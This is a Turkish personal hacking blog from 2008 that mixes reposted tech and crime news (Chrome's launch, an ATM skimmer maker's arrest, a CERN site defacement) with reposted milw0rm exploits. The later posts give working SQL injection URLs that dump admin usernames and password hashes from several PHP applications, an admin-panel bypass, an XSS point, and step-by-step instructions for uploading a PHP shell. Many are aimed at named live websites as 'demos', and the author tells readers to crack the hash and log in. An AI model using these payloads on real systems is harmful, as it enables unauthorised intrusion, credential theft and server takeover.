Dışarıdan bakıldığında akıcı ve basit bir tarayıcı bir tasarladık. Bir çok insana göre Internet tarayıcısı önemli olmayan, sadece web sayfalarını ve uygulamalarını çalıştırmak için kullandığımız bir araçtır. Klasik Google ana sayfası gibi Google Chrome da hızlı ve sade. Yolunuzdan çekiliyor ve sizi gitmek istediğiniz yere götürüyor.

Yakından incelendiğinde, günümüzün karmaşık Internet tabanlı uygulamalarını çok daha iyi çalıştıran bir Internet tarayıcısının temellerini atmayı başardık. Her bir sekmeyi ayrı bir "sandbox"ta tutarak bir sekmenin diğer bir sekmeyle çakışmasını engelleyip sakıncalı web sitelerine karşı çok daha gelişmiş bir koruma sağladık. Hızı ve yanıt verebilirliği arttırdık ve ayrıca günümüz tarayıcılarında kullanımı mümkün olmayan yeni nesil internet uygulamalarını desteklemesi için daha güçlü bir JavaScript makinası olan V8'i kurduk.

Bu daha sadece başlangıç, Google Chrome varacağı noktadan çok uzak. Bu Windows için uyumlu beta versiyonunu daha geniş bir tartışma başlatmak ve en yakın zamanda sizin fikirlerinizi öğrenmek için yayınlıyoruz. Mac ve Linux uyumlu versiyonlarını da hayata geçirmek için çalışıyoruz ve Google Chrome'u çok daha hızlı ve güçlü hale getirmek için çalışmaya devam edeceğiz.

Açık kaynak projelere çok şey borçluyuz ve onların yolundan devam ediyoruz. Apple'ın WebKit ve Mozilla'nın Firefox bileşenlerinden faydalandığımız kaynaklardan sadece ikisi ve biz de bütün kodlamamızı açık kaynak yapıyoruz. Internet'in ilerlemesi için bütün açık kaynak (yazılım) topluluğu ile birlikte çalışmayı umuyoruz.

Internet artan seçenekler ve yenilikler ile sürekli gelişiyor. Google Chrome da yeni bir seçenek ve umuyoruz ki Internet'in daha da gelişmesine katkıda bulunacak."


Kaynak: http://www.cnnturk.com/HaberDetay/Bilim_Teknoloji/157/Teknoloji/272/Hayrola_Google/492310/0

Sanal dünyanın gölge 'Hacker'ı yakalandı


bir kaç gündür sıkça rastladığım bir haber FBi ı Amerikayı kasp kavuran hacker işte yakanlanma anı ele geçirilen mühimmat vs

Sanal dünyanın gölge 'Hacker'ı yakalandı

İSTANBUL / Dünyanın 10 ayrı ülkesinin sahtecilik şebekesine ATM kart kopyalayıcıları ihraç ederek, 5 milyar Dolarlık bir sanal soygun yapılmasını sağlayan “Chao” takma isimli Çağatay Evyapan Tuzla’daki 4 katlı havuzlu villasında yakalandı.

1 MİLYAR DOLARLIK ZARAR VERMEYİ PLANLIYORDU
Düzenek gönderdiği 10 ayrı ülkenin polisi tarafından “Chao” takma ismiyle aranan Çağatay Evyapan kendisini yakalamak için sürekli olarak sitesini hackleyen FBI’dan intikam almak için de Bank Of America isimli bankanın düzeneğini basarak o ülkede bulunan sahtecilere bedava göndermeyi planladığı ve böylece en az 1 milyar Dolarlık bir vurgunla Amerika’ya zarar vermeyi düşündüğü ortaya çıktı. Operasyonda, Evyapan’ın yardımcısı Hakkan Özkan ile düzenek imalatında çalışan 2 dizayncı, 1 kalıpçı ve 1 boyacı da yakalanarak gözaltına alındı.

İstanbul Bilişim Suçları ve Sistemleri Şube Müdürlüğü Ekipleri, tüm dünya ülkesinin peşinde koştuğu “Chao” isimli sanal dolandırıcıyı yakalamak için Beyoğlu, Eyüp, Gaziosmanpaşa, Kadıköy, Küçükçekmece ve Tuzla’da eş zamanlı baskın düzenledi.

FBI YAKALAMAK İÇİN ÖZEL BİR EKİP GÖREVLENDİRMİŞ
Amerika’daki kredi kartı kopyalayan şebekenin kullandığı tüm malzemelerin Türkiye’den “Chao” takma isimli bir kişi tarafından Türkiye’den gönderildiğini belirleyen FBI, sanal dolandırıcıların “Piri” konumundaki “Chao” yu yakalamak için özel bir ekip görevlendirdi. Chao’nun sitelerini dahi hackleyen FBI bir türlü onun gerçek kimliğini ve tam adresini belirlemeyi başaramadı.

YARDIMCISININ ZAAFI YAKALATTI
İstanbul Bilişim Şube Müdürlüğü ekipleri, FBI’ın gerçek ismini dahi belirleyemediği “Chao” takmi isimli Çağatay Evyapı’nın yardımcısı Hakan Özkan’ı tespit etti. Evyapı’nın yakalanmamak için kendi imal ettiği düzenekleri hiç kullanmazken yardımcısının ısrarıyla bir defa kullanma kararı aldılar. Polis ekipleri Özkan’ı ATM kamerasındaki görüntülerinden tespit ederek takibe aldı.

TUZLA’DAKİ 4 KATLI VİLLASINDA YAKALANDI
İstanbul Bilişim polisi Hakkan Özkan’ı takibe aldı. Chao'nun sadece yardımcısının girmesine izin verdiği Tuzla’daki 4 katlı havuzlu evin yeri böylece tespit edildi.

70 MÜŞTEKİ ŞİKAYETÇİ OLDU
Çağatay Evyapı ve yardımcısı Hakkan Özkan’ın ilk defa kullandıkları kart kopyalama cihazları nedeniyle mağdur olan 70 kişi şebekeden şikayetçi oldu.

CEZAEVİ FİRARİSİ ELEKTRONİKÇİ ÇIKTI
Hakkan Özkan’ı takip ederek Tuzla’daki villayı bulana Bilişim Polisi 4 katlı havuzlu villaya baskın yaparak “Chao” takma isimli Çağatay Evyapan’ı yakalamayı başardı. Akdeniz Üniversitesi Elektronik Yüksek Okulu’nu terk eden Çağatay Evyapan’ın 1993,1998 ve 2000 yıllarında iflas ve kredi kartı dolandırıcılığı suçlamasıyla 3 defa cezaevine girdiği en son olarak Ankara’daki yarı açık bir cezaevinden 2005 yılında firar ettiği belirlendi.

SANAL DÜNYANIN GÖLGE ADAMI
Dünyadaki tüm sanal dolandırıcılar onu “Chao” takma ismiyle tanınıyor. Tüm dünyada “Sanal dünyanın gölge adamı” olarak biliniyor. Açtığı Darkmarket.ws isimli internet sitesine tüm dünyadan 3 bin sahteci üye. Çağatay Evyapan’ın sitesine üye olabilmek için de en az 3 sahtecinin referansının alınması gerekiyor. Evyapan bu site üzerinden siparişler alarak 10 ayrı ülkenin ATM düzeneğini 10 ayrı dilde hazırlayıp onlara gönderiyor.

TÜM DÜNYAYA DÜZENEK İHRAÇ ETMİŞ
Çağatay Evyapan’ın 10 ayrı dilde ve 10 ayrı ülkenin banka ATM düzeneklerini imal ederek düzenek başı 3 ile 10 bin dolar arasında para aldığı belirlendi. Evyapan’ın son olarak 500 milyon Dolarlık sipariş aldığı tespit edildi.

SANAL DOLANDIRICILARININ BİLİRKİŞİSİ
Tüm dünya sanal dolandırıcılık şebekesi arasında “Chao” takma ismiyle sanal dünyanın gölge adamı olarak bilinen Çağatay Evyapan’ın haklı bir üne kavuştuğu, dünyadaki tüm şebeke elemanlarının yaptıkları kopya kartları ona göndererek bu iş yapar mı diye sorduğu, Evyapan’ın da bu kartları inceleyerek kart hakkında özel bir rapor yazdığı ve bu işlerden bile para kazandığı belirlendi.

5 MİLYAR DOLARLIK VURGUN YAPILMIŞ
Çağatay Evyapan’ın Amerika, Kanada, Fransa, İngiltere, İsveç, İspanya, Brezilya, Macaristan, Güney Afrika ve Sırbistan’ın banka düzenekleri için 10 ayrı dilde ATM düzenekleri yaparak gönderdiği belirlendi. Evyapan’ın gönderdiği bu düzeneklerle sahtecilik şebekelerinin 5 milyar Dolarlık vurgun yaptığı belirlendi.

FBI’DAN İNTİKAM İÇİN DÜZENEK HAZIRLAMIŞ
Çağatay Evyapan FBI’ın kendisini yakalamak için sürekli olarak sitesinin hacklemesi üzerine Amerika’dan intikam almak için müthiş bir planı uygulamaya soktuğu ortaya çıktı. Evyapan’ın Amerika’nın dünyaca ünlü en büyük bankalarından olan Bank Of America isimli bankanın bin adet düzeneğini hazırlayarak burada bulunan sahtecilik şebekesine bedava göndermeyi planladığı, daha sonra bu şebeke elemanlarının Bank Of America ATM’lerine aynı anda bu cihazları yerleştirerek aynı anda en az 500 milyon dolar para çekerek sanal sahtecilik dünyasında “Skimming” denilen işlemi gerçekleştirmeyi planladıkları ortaya çıktı. Poliste susma hakkını kullanan Çağatay Evyapan, sözlü olarak polise, “Eğer beni 6 ay daha yakalamasaydınız Amerika’ya en az 1 milyar Dolarlık zarar verecektim” dediği öğrenildi.

KOMPLE İMALAT EKİBİ YAKALANDI
Dünyada 10 ayrı ülke polisi tarafından aranan Çağatay Evyapan’ın her ATM kopyalayıcısına ayrı bir proğram yazdığı böylece kopyalayıcılar çalınsa bile başka bir şebeke tarafından asla kullanılamadığı tespit edildi. Bilişim Şube Müdürlüğü ekipleri, tüm dünya sahtecilik şebekesinin ATM düzeneğini hazırlayan Çağatay Evyapan’ın imalat ekibinde yer alan 2 dizayncı, 1 kalıpçı ve 1 boyacıyı da İkitelli’de yakalayarak gözaltına aldı.

ŞEBEKE ELEMANLARINDAN ELE GEÇİRİLEN MALZEMELER
2 bin 829 adet ATM tuşu bin 325 adet ATM giriş haznesi, 950 adet entegre, 875 adet kart okuyucu, 811 adet bankalara ait kartlar, 457 adet skimmer, 240 adet elektronik devre, 28 adet yurt dışına gönderilmek için özel yazılımı yapılmış olan pos cihazı, düzenek hazırlamak için yapılmış kalıplar, 4 adet gizli kamera ve düzeneği, 4 adet hafıza kartı, 4 adet bilgisayar kasası, 4 adet mini kart kopyalayıcı, 2 adet lap top, çok sayıda malzeme ile 21 bin YTL ve 600 ABD Doları para ele geçirildi.

Kaynak: http://www.gazeteport.com.tr/GUNCEL/NEWS/GP_284272

14 Eylül 2008 Pazar

Hackerlar CERN'e sızdı



Biraz önce rastladığım bir haberi yayınlamak istedim

Yüzyılın deneyini gerçekleştiren CERN'in bilgisayar sistemine sızan bilgisayar korsanları, sistemin güvenlik açıklarıyla dalga geçti
The Daily Telegraph'ın haberine göre bir grup Yunan hacker, dünyanın en sıkı korunan sistemlerinden biriyle çalışan CERN'in sistemine saldırdı. CERN, olayla ilgili açıklamada bulunmadı ancak bilgisayar güvenliğinin gözden geçirilmesine başlandı.

Hacker grubu, CERN'in "Asrın Deneyi" için 10 Eylül'de çalıştırdığı LHC'ye (Büyük Hadron Çarpıştırıcısı) bağlı CMS detektörünün www.cmsmon.cern.ch adlı sitesine saldırıp dalgalarını geçti.

Protonların dev dedektörlerden geçtiği sırada CERN bilgisayarlarına giren hackerlar gönderdikleri mesajlarla uyarıda bulunup güvenlik zaafıyla alay etti.

LHC deneyine zarar vermek gibi bir amaçları bulunmadığını belirten hackerlar bu saldırıyı güvenlik açığını göstermek için yaptıklarını söyledi.

Dünyanın en büyük deneyini yapan CERN çalışanı bilim adamları daha önce yaptıkları açıklamada, tehdit mailleri aldıklarını söylemişlerdi.

Kaynak: http://ozturkler.com/cern-hacker-bilgisayar-guvenlik-aciklari.html,08a5c


h4ckinger hacklendi : (

gerçekten üzülerek söylüyorum h4ckinger hacklendi. bugün rastladım habere ve yayınlamak istedim :( neyse geçmiş olsun diyelim

işte zone:

http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,7938909

ayrıca pier0.us yani pier0 da hacklenmiş

işte zone:

http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,7938991/

http://mirror.gen.tr/Defaced/51425/www.pier0.us


13 Eylül 2008 Cumartesi

Rahim Sağlam Bu Senede Gelemessen Ölürüm

Rahim Sağlam Bu Senede Gelemessen Ölürüm Süper Dinlemenizi Tavsiye Ederim

Download link:

TIKLA iNDiR

Rahim Sağlam


İşte Muhteşem bir sese sahip Rahim Sağlam ın hayat hikayesi

Rahim Sağlam

1961 yılında Aşkale’nin Dereköyü’nde doğdu. İlköğrenimi köyünde tamamladı.

Küçük yaşlardan itibaren aşıklık geleneğini, halk şiirini ve bağlama çalmayı öğrenmeye, yaklaşık 16 yaşlarında şiir yazmaya başladı. Bir süre Aşık Mihmani, bir süre de Aşık Reyhani’ye çıraklık ederek bilgisini pekiştirdi.

Değişik bölgelerde yarışma şenliklere katılan Rahim Sağlam, şiirlerinde bazen adını, bazen de Rahimi mahlasını kullanmaktadır.

Rahim Sağlam bugüne dek 10 kadar albüm hazırladı. Ayrıca Batılı araştırmacıların hazırladığı albümlerde türküleri yeraldı.

11 Eylül 2008 Perşembe

Autodealers CMS AutOnline (id) SQL Injection Vulnerability

Autodealers CMS AutOnline (id) SQL Injection Vulnerability

orjinal link:

http://www.milw0rm.com/exploits/6433


exploit:

http://localhost/script_path/index.php?page=detail&id=[SQL]


[SQL]=

ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

demo:

http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

9 Eylül 2008 Salı

Live TV Script (index.php mid) SQL Injection Vulnerability

Live TV Script (index.php mid) SQL Injection Vulnerability

Discovered By: ZoRLu

orjinal bug:

http://www.milw0rm.com/exploits/6404


Exploit :

http://localhost/script_path/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members--

Demo:

http://indiaportal.org/demo/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members--

Admin Panel:

http://localhost/script_path/siteadmin/

Masaüstünde En İnce Klavye



Farklı ürünleriyle dikkat çeken Logitech, masaüstü bilgisayarlar için bugüne kadar ürettiği en ince klavyeyi piyasaya sunuyor.
Şık tasarımlarıyla ön plana çıkan Logitech şimdi de masaüstü bilgisayarlarda kullanılmak üzere en ince klavyeyi üretti. 9.3 mm'lik klavyede bir diğer güzel özellik ise tüm tuşların ayarı yapılabilen arkadan ışıklandırmalı sisteme sahip oluşu. Ekim ayından itibaren raflarda yerini alacak ürün 80$'lık satış fiyatıyla tüketicilerle buluşacak.
Klavye yumuşak bir tuş takımına ve ekstra multimedya tuşlarına da sahip olacak.
Öte yandan dizüstü bilgisayarlara yönelik 2.4 GHz'lik kablosuz DiNovo klavye modeli de yine Ekim ayından itibaren 100$'a satışa sunulacak. Bu modeldeki en dikkat çekici özellik ise 3 senelik pil ömrü.
Şirketin yeni klavyelerinden bir diğeri de masaüstü serisine eklenecek olan kablosuz S520, Eylül ayından itibaren 60$'lık satış fiyatıyla klavye + optik fare seti şeklinde raflarda yerini alacak.

7 Eylül 2008 Pazar

ahada yeni blog online

şükür kavuşturana : P daha önce ownspace.org şerefsizinden açmıstım ( z0rlu.ownspace.org ) tüm emeklerim boşa gitti çünkü domain kapanmış : ( neyse baktım böle dandik sitelerle olmuyor bende blogspot tan bir blog açtım. herkese hayırlı olsun : )

Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability

Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability

exploit:

http://localhost/datingzone_path/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15

demo:

http://datingzone.vastal.com/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15

# milw0rm.com [2008-09-06]

ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities

yine kritik bir acık daha yine admin şifresine ve nickine ulaşmak mümkün.

ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities

http://localhost/clanlite_path/service/profil.php?link=[SQL]

[SQL]=

ZoRLu'/**/union/**/select/**/null,null,mail,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,0x3a,psw),null,null,null/**/from/**/clanlite_user/*

[XSS]=

http://localhost/clanlite/service/calendrier.php?mois=6&annee=[XSS]

# milw0rm.com [2008-05-12]

Crazy Goomba 1.2.1 (id) Remote SQL Injection Vulnerability

Bu açıkla mevcut sitede admin hash ve nick ine ulaşmak mümkün. kritik bir açık.

Crazy Goomba 1.2.1 (id) Remote SQL Injection Vulnerability

http://localhost/Crazy_Goomba_1.2.1_path/commentaires.php?id=[SQL]

[SQL]1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**

( [SQL] yazan yere kodu yaz admin name, password(md5) ve email adresine ulas )md5 i kır ve giris yap

http://localhost/Crazy_Goomba_1.2.1_path/index.php?page=connexion ( login )

sonra admin panele baglanadmin panel:

http://localhost/Crazy_Goomba_1.2.1_path/administration/admin.php

# milw0rm.com [2008-04-21]

Pigyard Art Gallery Multiple Remote Vulnerabilities

Bu açık sayesinde scriptin mevcut olduğu sitelerde dosya upload, sql injection ve admin bypass yapmamız mümkün.

Pigyard Art Gallery Multiple Remote Vulnerabilities

admin bypass

Pictures Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_pictures
example web sites:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_pictures

Availibility Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_availibilities
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_availibilities
Exhibitions Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_exhibitions
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_exhibitions

Genres Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_genres
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_genresMedia

Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_media
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_media

Artist Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_artists
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_artists

Empty Artists and Exhibitions Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_empty_picture_associates
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_empty_picture_associates

file upload:

http://localhost/php/templates/file_uploader/file_selector.php
example:
http://www.pigyardgallery.com/php/templates/file_uploader/file_selector.php

sql injection:

SQL inj.exploit 1:
http://loaclhost/module.php?module=gallery&modPage=show_pictures&artist=
[SQL]exploit 2:
http://loaclhost/module.php?module=gallery&modPage=show_pictures&exhibition=
[SQL]exploit 3
http://loaclhost/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=
[SQL]example web site:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&artist=[SQL]

http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]

http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]

example [SQL] : -1/**/union/**/select/**/0,1,2,3,4/*

Added a default sql injection string by Aria-Security Team /str0keAria-Security Team, http://Aria-Security.net-------------------------------Shout Outs: AurA, imm02tal, iM4N, Kinglet,Vendor: Pigyard Art Gallery Multiple SQL InjectionThis is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181)Original

Link:
http://forum.aria-security.net/showthread.php?p=1474module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*Regards,The-0utl4w

# milw0rm.com [2008-02-24]

Powered by PHPizabi v0.848b C1 HFP1 remote file upload

Bu açık sayesinde scriptin kurulu olduğu siteye dosya upload yapabiliyoruz. Bu fırsatın art niyetli birinin eline geçtiğini bir düşünün. resim upload yerine bir shell upload edebilir dolayısıyla serverda yetki elde etmiş olur.

Powered by PHPizabi v0.848b C1 HFP1 remote file upload

exploit:http://localhost/izabi/system/cache/pictures/id_shell.php-first register web site

-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )

-event title and description write. show to select All the users. gözat button click and shell.php upload
-after go to event page. upload photo right click. open the menu click to properties. copy the url

example:http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
and exploit:
http://localhost/izabi/system/cache/pictures/xxx_shell.php
example web site:
http://bitchinindie.com/system/image.php?file=597_shell.php&width=500
exploit shell.php
http://bitchinindie.com/system/cache/pictures/597_shell.php

# milw0rm.com [2008-02-17]
 
Dizi